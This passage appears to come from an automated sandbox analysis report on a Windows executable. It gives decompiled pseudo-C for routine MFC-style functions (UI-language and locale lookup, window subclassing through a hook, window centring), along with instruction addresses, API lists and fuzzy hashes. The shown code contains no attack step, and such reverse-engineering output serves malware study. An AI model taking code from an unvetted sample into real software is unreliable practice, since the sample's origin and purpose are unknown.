                                                                                                                            0x004031fd
                                                                                                                            0x0040320f
                                                                                                                            0x0040321b
                                                                                                                            0x00403220
                                                                                                                            0x00403223
                                                                                                                            0x00403223
                                                                                                                            0x004031ee
                                                                                                                            0x0040322d
                                                                                                                            0x0040322d
                                                                                                                            0x004031a6
                                                                                                                            0x004030b9
                                                                                                                            0x004030c1
                                                                                                                            0x004030c4
                                                                                                                            0x004030c7
                                                                                                                            0x004030d9
                                                                                                                            0x004030e2
                                                                                                                            0x004030e5
                                                                                                                            0x004030ea
                                                                                                                            0x004030ed
                                                                                                                            0x004030f7
                                                                                                                            0x004030fa
                                                                                                                            0x00403101
                                                                                                                            0x00403105
                                                                                                                            0x00403109
                                                                                                                            0x0040310c
                                                                                                                            0x0040310f
                                                                                                                            0x0040311c
                                                                                                                            0x00403128
                                                                                                                            0x0040312d
                                                                                                                            0x00403130
                                                                                                                            0x00403130
                                                                                                                            0x00403137
                                                                                                                            0x00403137
                                                                                                                            0x0040313c
                                                                                                                            0x0040313f
                                                                                                                            0x00403156
                                                                                                                            0x0040315d
                                                                                                                            0x0040316c
                                                                                                                            0x004032a2
                                                                                                                            0x004032a9
                                                                                                                            0x004032b9
                                                                                                                            0x004032bc
                                                                                                                            0x004032bf
                                                                                                                            0x004032c6
                                                                                                                            0x004032c9
                                                                                                                            0x004032d0
                                                                                                                            0x004032dc
                                                                                                                            0x004032e6
                                                                                                                            0x004032eb
                                                                                                                            0x004032eb
                                                                                                                            0x004032f0
                                                                                                                            0x004032f5
                                                                                                                            0x00403312
                                                                                                                            0x00403312
                                                                                                                            0x00403319
                                                                                                                            0x0040331e
                                                                                                                            0x00000000
                                                                                                                            0x004032f7
                                                                                                                            0x004032f7
                                                                                                                            0x004032fe
                                                                                                                            0x00403306
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403308
                                                                                                                            0x0040330c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040330e
                                                                                                                            0x00403310
                                                                                                                            0x00000000
                                                                                                                            0x00403310
                                                                                                                            0x00403172
                                                                                                                            0x00403172
                                                                                                                            0x00403320
                                                                                                                            0x00403323
                                                                                                                            0x0040332b
                                                                                                                            0x0040332c
                                                                                                                            0x0040332d
                                                                                                                            0x00403342
                                                                                                                            0x00403342

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0040307D
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040309E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 004030AF
                                                                                                                            • ConvertDefaultLocale.KERNELBASE(?), ref: 004030E5
                                                                                                                            • ConvertDefaultLocale.KERNELBASE(?), ref: 004030ED
                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00403101
                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 00403125
                                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040312B
                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00403164
                                                                                                                            • GetVersion.KERNEL32 ref: 00403179
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0040319E
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004031C3
                                                                                                                            • _sscanf.LIBCMT ref: 004031E3
                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 00403218
                                                                                                                            • ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 0040321E
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040322D
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040323D
                                                                                                                            • EnumResourceLanguagesA.KERNEL32 ref: 00403258
                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 00403289
                                                                                                                            • ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 0040328F
                                                                                                                            • _memset.LIBCMT ref: 004032A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                            • API String ID: 434808117-483790700
                                                                                                                            • Opcode ID: 0bbc075f6795f1fb76f2591cc202448cae1d5b94dee36434c6763a68eba1487b
                                                                                                                            • Instruction ID: 9385397aaad625ec684ae65ec854ca62181b171360ddd37449900155b2eca08e
                                                                                                                            • Opcode Fuzzy Hash: 0bbc075f6795f1fb76f2591cc202448cae1d5b94dee36434c6763a68eba1487b
                                                                                                                            • Instruction Fuzzy Hash: F0815EB1D00258ABCB14DFA5DC45BFEBBB8EB58301F10052BE855F7280D7B89A45CB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B9E9 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 179COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040B9E9(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E0041E9EA(E004314DB, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E00405A19);
				 *(_t117 - 0x120) = _t111;
				_t54 = E0040E7CC(_t94, 0x442940, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E0040D8B0(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E0040706D(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x4446c0;
						if( *0x4446c0 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x44440c;
								if( *0x44440c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x44440c; // 0x8000
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14)); // executed
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113); // executed
													SetWindowLongA(_t94, 0xfffffffc, E0040B8A5);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E0041EC90(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E00408C43(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x44440c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E0041EFD9(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E004070B9(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E0040A1BD(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040A8BA);
							__eflags = _t83 - E0040A8BA;
							if(_t83 != E0040A8BA) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E00406890();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E00402C6F(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E0041EA6D(_t94, _t106, _t111);
				}
			}



























                                                                                                                            0x0040b9e9
                                                                                                                            0x0040b9e9
                                                                                                                            0x0040b9e9
                                                                                                                            0x0040b9f3
                                                                                                                            0x0040b9f8
                                                                                                                            0x0040b9fb
                                                                                                                            0x0040b9fe
                                                                                                                            0x0040ba08
                                                                                                                            0x0040ba0e
                                                                                                                            0x0040ba15
                                                                                                                            0x0040ba17
                                                                                                                            0x0040ba1a
                                                                                                                            0x0040ba22
                                                                                                                            0x0040ba24
                                                                                                                            0x0040ba24
                                                                                                                            0x0040ba2d
                                                                                                                            0x0040ba42
                                                                                                                            0x0040ba44
                                                                                                                            0x0040ba47
                                                                                                                            0x0040ba4c
                                                                                                                            0x0040ba4e
                                                                                                                            0x0040ba52
                                                                                                                            0x0040ba58
                                                                                                                            0x0040ba6f
                                                                                                                            0x0040ba6f
                                                                                                                            0x0040ba76
                                                                                                                            0x0040bac3
                                                                                                                            0x0040bac3
                                                                                                                            0x0040bac5
                                                                                                                            0x0040bb2d
                                                                                                                            0x0040bb35
                                                                                                                            0x0040bb71
                                                                                                                            0x0040bb7d
                                                                                                                            0x0040bb84
                                                                                                                            0x0040bbb6
                                                                                                                            0x0040bbb9
                                                                                                                            0x0040bbbf
                                                                                                                            0x0040bbc1
                                                                                                                            0x0040bbc4
                                                                                                                            0x0040bbcc
                                                                                                                            0x0040bbd3
                                                                                                                            0x0040bbd5
                                                                                                                            0x0040bbd7
                                                                                                                            0x0040bbde
                                                                                                                            0x0040bbe6
                                                                                                                            0x0040bbe8
                                                                                                                            0x0040bbeb
                                                                                                                            0x0040bbee
                                                                                                                            0x0040bbfc
                                                                                                                            0x0040bbfc
                                                                                                                            0x0040bbeb
                                                                                                                            0x0040bbd7
                                                                                                                            0x0040bc02
                                                                                                                            0x0040bc08
                                                                                                                            0x0040bc14
                                                                                                                            0x0040bc1a
                                                                                                                            0x0040bc21
                                                                                                                            0x0040bc23
                                                                                                                            0x0040bc28
                                                                                                                            0x0040bc2e
                                                                                                                            0x0040bc2e
                                                                                                                            0x0040bc2e
                                                                                                                            0x0040bc2e
                                                                                                                            0x00000000
                                                                                                                            0x0040bc32
                                                                                                                            0x00000000
                                                                                                                            0x0040bb86
                                                                                                                            0x0040bb39
                                                                                                                            0x0040bb44
                                                                                                                            0x0040bb4f
                                                                                                                            0x0040bb55
                                                                                                                            0x0040bb5b
                                                                                                                            0x0040bb5c
                                                                                                                            0x0040bb5e
                                                                                                                            0x0040bb66
                                                                                                                            0x0040bb69
                                                                                                                            0x0040bb6f
                                                                                                                            0x0040bb95
                                                                                                                            0x0040bb9b
                                                                                                                            0x0040bb9d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bba7
                                                                                                                            0x0040bbab
                                                                                                                            0x0040bbb0
                                                                                                                            0x0040bbb4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bbb4
                                                                                                                            0x00000000
                                                                                                                            0x0040bb6f
                                                                                                                            0x0040bacd
                                                                                                                            0x0040bad2
                                                                                                                            0x0040bad9
                                                                                                                            0x0040bae2
                                                                                                                            0x0040baf8
                                                                                                                            0x0040bafa
                                                                                                                            0x0040bb00
                                                                                                                            0x0040bb02
                                                                                                                            0x0040bb04
                                                                                                                            0x0040bb04
                                                                                                                            0x0040bb0c
                                                                                                                            0x0040bb10
                                                                                                                            0x0040bb14
                                                                                                                            0x0040bb18
                                                                                                                            0x0040bb1e
                                                                                                                            0x0040bb21
                                                                                                                            0x0040bb23
                                                                                                                            0x0040bb23
                                                                                                                            0x00000000
                                                                                                                            0x0040bb18
                                                                                                                            0x0040ba7b
                                                                                                                            0x0040ba81
                                                                                                                            0x0040ba86
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ba8c
                                                                                                                            0x0040ba8f
                                                                                                                            0x0040ba94
                                                                                                                            0x0040baa1
                                                                                                                            0x0040baa5
                                                                                                                            0x0040baab
                                                                                                                            0x0040baab
                                                                                                                            0x0040bab4
                                                                                                                            0x0040bab9
                                                                                                                            0x0040babd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040babd
                                                                                                                            0x0040ba5a
                                                                                                                            0x0040ba61
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ba67
                                                                                                                            0x0040ba69
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ba2f
                                                                                                                            0x0040ba37
                                                                                                                            0x0040bc34
                                                                                                                            0x0040bc39
                                                                                                                            0x0040bc39

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040B9F3
                                                                                                                              • Part of subcall function 0040E7CC: __EH_prolog3.LIBCMT ref: 0040E7D3
                                                                                                                            • CallNextHookEx.USER32(?,?,?,?), ref: 0040BA37
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • GetClassLongA.USER32 ref: 0040BA7B
                                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 0040BAA5
                                                                                                                            • SetWindowLongA.USER32 ref: 0040BAFA
                                                                                                                            • _memset.LIBCMT ref: 0040BB44
                                                                                                                            • GetClassLongA.USER32 ref: 0040BB74
                                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 0040BB95
                                                                                                                            • GetWindowLongA.USER32 ref: 0040BBB9
                                                                                                                            • GetPropA.USER32 ref: 0040BBD3
                                                                                                                            • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 0040BBDE
                                                                                                                            • GetPropA.USER32 ref: 0040BBE6
                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 0040BBEE
                                                                                                                            • SetWindowLongA.USER32 ref: 0040BBFC
                                                                                                                            • CallNextHookEx.USER32(?,00000003,?,?), ref: 0040BC14
                                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 0040BC28
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                            • String ID: #32768$@)D$AfxOldWndProc423$ime
                                                                                                                            • API String ID: 867647115-3620262527
                                                                                                                            • Opcode ID: 0db3286cfa60b16550bc5abef8cd4095aa125aced8150e5bccfbc634165e9299
                                                                                                                            • Instruction ID: 3bf181b55df1ae097f7e83dfbafca5cc09dfe48136ac99e2ccf5911c499d9dda
                                                                                                                            • Opcode Fuzzy Hash: 0db3286cfa60b16550bc5abef8cd4095aa125aced8150e5bccfbc634165e9299
                                                                                                                            • Instruction Fuzzy Hash: F261B131504215ABDB24AF65DC49BAB7BB8EF04325F10417AF805B62D1DB389E81CBEC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409B50 Relevance: 19.7, APIs: 13, Instructions: 176windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 100 409b50-409b6a call 40ce51 103 409b71-409b78 100->103 104 409b6c-409b6f 100->104 106 409b85-409b8a GetWindow 103->106 107 409b7a-409b83 GetParent 103->107 105 409bac-409bc3 GetWindowRect 104->105 109 409c54-409c7b GetParent GetClientRect * 2 MapWindowPoints 105->109 110 409bc9-409bcb 105->110 108 409b90-409b94 106->108 107->108 108->105 111 409b96-409ba8 SendMessageA 108->111 114 409c81-409cc6 109->114 112 409be6-409bef 110->112 113 409bcd-409bdb GetWindowLongA 110->113 111->105 115 409baa 111->115 118 409bf1-409bf8 call 402551 112->118 119 409c2b-409c52 GetWindowRect call 407da9 call 407e14 CopyRect 112->119 116 409be4 113->116 117 409bdd-409be2 113->117 120 409cc8-409ccb 114->120 121 409ccd-409cd2 114->121 115->105 116->112 117->112 117->116 130 409bfa 118->130 131 409bfd-409c29 call 407da9 call 407e14 CopyRect * 2 118->131 119->114 123 409cdc-409ce0 120->123 121->123 124 409cd4-409cda 121->124 127 409ce2-409ce5 123->127 128 409ce7-409cef 123->128 124->123 132 409cfa-409d07 call 40d105 127->132 128->132 133 409cf1-409cf7 128->133 130->131 131->114 139 409d0c-409d0f 132->139 133->132
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00409B50(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				void* _t85;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E0040CE51(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E00407E14(_t121, E00407DA9(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E00402551();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E00407E14(_t121, E00407DA9(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				_t85 = E0040D105(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15); // executed
				return _t85;
			}


























                                                                                                                            0x00409b50
                                                                                                                            0x00409b50
                                                                                                                            0x00409b57
                                                                                                                            0x00409b5a
                                                                                                                            0x00409b62
                                                                                                                            0x00409b65
                                                                                                                            0x00409b6a
                                                                                                                            0x00409b78
                                                                                                                            0x00409b8a
                                                                                                                            0x00409b7a
                                                                                                                            0x00409b7d
                                                                                                                            0x00409b7d
                                                                                                                            0x00409b90
                                                                                                                            0x00409b94
                                                                                                                            0x00409ba0
                                                                                                                            0x00409ba8
                                                                                                                            0x00409baa
                                                                                                                            0x00409baa
                                                                                                                            0x00409ba8
                                                                                                                            0x00409b6c
                                                                                                                            0x00409b6c
                                                                                                                            0x00409b6c
                                                                                                                            0x00409b6c
                                                                                                                            0x00409bac
                                                                                                                            0x00409bba
                                                                                                                            0x00409bc3
                                                                                                                            0x00409c63
                                                                                                                            0x00409c6a
                                                                                                                            0x00409c71
                                                                                                                            0x00409c7b
                                                                                                                            0x00409bc9
                                                                                                                            0x00409bcb
                                                                                                                            0x00409bd0
                                                                                                                            0x00409bdb
                                                                                                                            0x00409be4
                                                                                                                            0x00409be4
                                                                                                                            0x00409bdb
                                                                                                                            0x00409be8
                                                                                                                            0x00409bef
                                                                                                                            0x00409c30
                                                                                                                            0x00409c3f
                                                                                                                            0x00409c4c
                                                                                                                            0x00409bf1
                                                                                                                            0x00409bf1
                                                                                                                            0x00409bf8
                                                                                                                            0x00409bfa
                                                                                                                            0x00409bfa
                                                                                                                            0x00409c0a
                                                                                                                            0x00409c1d
                                                                                                                            0x00409c27
                                                                                                                            0x00409c27
                                                                                                                            0x00409bef
                                                                                                                            0x00409c8a
                                                                                                                            0x00409c8f
                                                                                                                            0x00409c94
                                                                                                                            0x00409c98
                                                                                                                            0x00409c9b
                                                                                                                            0x00409ca2
                                                                                                                            0x00409caa
                                                                                                                            0x00409cb2
                                                                                                                            0x00409cba
                                                                                                                            0x00409cc1
                                                                                                                            0x00409cc6
                                                                                                                            0x00409cd2
                                                                                                                            0x00409cda
                                                                                                                            0x00409cda
                                                                                                                            0x00409cc8
                                                                                                                            0x00409cc8
                                                                                                                            0x00409cc8
                                                                                                                            0x00409ce0
                                                                                                                            0x00409cef
                                                                                                                            0x00409cf7
                                                                                                                            0x00409cf7
                                                                                                                            0x00409ce2
                                                                                                                            0x00409ce2
                                                                                                                            0x00409ce2
                                                                                                                            0x00409d07
                                                                                                                            0x00409d0f

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040CE51: GetWindowLongA.USER32 ref: 0040CE5C
                                                                                                                            • GetParent.USER32(?), ref: 00409B7D
                                                                                                                            • SendMessageA.USER32 ref: 00409BA0
                                                                                                                            • GetWindowRect.USER32 ref: 00409BBA
                                                                                                                            • GetWindowLongA.USER32 ref: 00409BD0
                                                                                                                            • CopyRect.USER32 ref: 00409C1D
                                                                                                                            • CopyRect.USER32 ref: 00409C27
                                                                                                                            • GetWindowRect.USER32 ref: 00409C30
                                                                                                                              • Part of subcall function 00407DA9: MonitorFromWindow.USER32(00000002,00000000), ref: 00407DBE
                                                                                                                              • Part of subcall function 00407E14: GetMonitorInfoA.USER32(00000002,00000000), ref: 00407E29
                                                                                                                            • CopyRect.USER32 ref: 00409C4C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: RectWindow$Copy$LongMonitor$FromInfoMessageParentSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1450647913-0
                                                                                                                            • Opcode ID: b8b9284ff394d38d134d8a530b5c5c2fb53054aadff65b1e75fbd6a90f9850ab
                                                                                                                            • Instruction ID: 9684b154aef8d5cb1c3312d3099818c72590263415cf3924570ea36fbcacb78f
                                                                                                                            • Opcode Fuzzy Hash: b8b9284ff394d38d134d8a530b5c5c2fb53054aadff65b1e75fbd6a90f9850ab
                                                                                                                            • Instruction Fuzzy Hash: AC514F72D04119ABDB01DFA8DC85EEEBBB9BF48314F154126E905F3291D738ED418B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00419B6E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
